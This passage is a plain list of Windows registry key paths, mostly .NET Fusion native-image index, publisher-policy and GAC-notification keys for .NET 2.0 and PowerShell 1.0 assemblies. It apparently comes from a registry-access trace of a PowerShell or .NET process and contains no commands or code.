HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\30bc7c4f\3f50fe4f\90\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\424bd4d8\1c83327b\8e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3f50fe4f\6f1da7aa\90\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\130e9a23\5569937f\3e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3b249b34\157e0c82\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b1a4e4\38a3212c\4c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3a6a696d\52d7076e\7a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\5b43ba09\4355c2d6\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Transactions,2.0.0.0,,b77a5c561934e089,AMD64
HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine\ApplicationBase
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5d88ef29\7f5cd084\3f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7f5cd084\5675326b\3f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7ac727df\7b5311d7\69\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\475dce40\2d382ce6\8d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\7b5311d7\1b0ed4d\69\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Core,3.5.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\7f0603e4\73843e06\6e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\41c04c7e\7f3b6ac4\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\c991064\2bd33e1c\81\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\34cea914\43f5e26f\2d\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\39f21844\3feac0d8\2c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3c9c8d7b\46b95040\74\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\43f5e26f\3b5d08db\2d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeI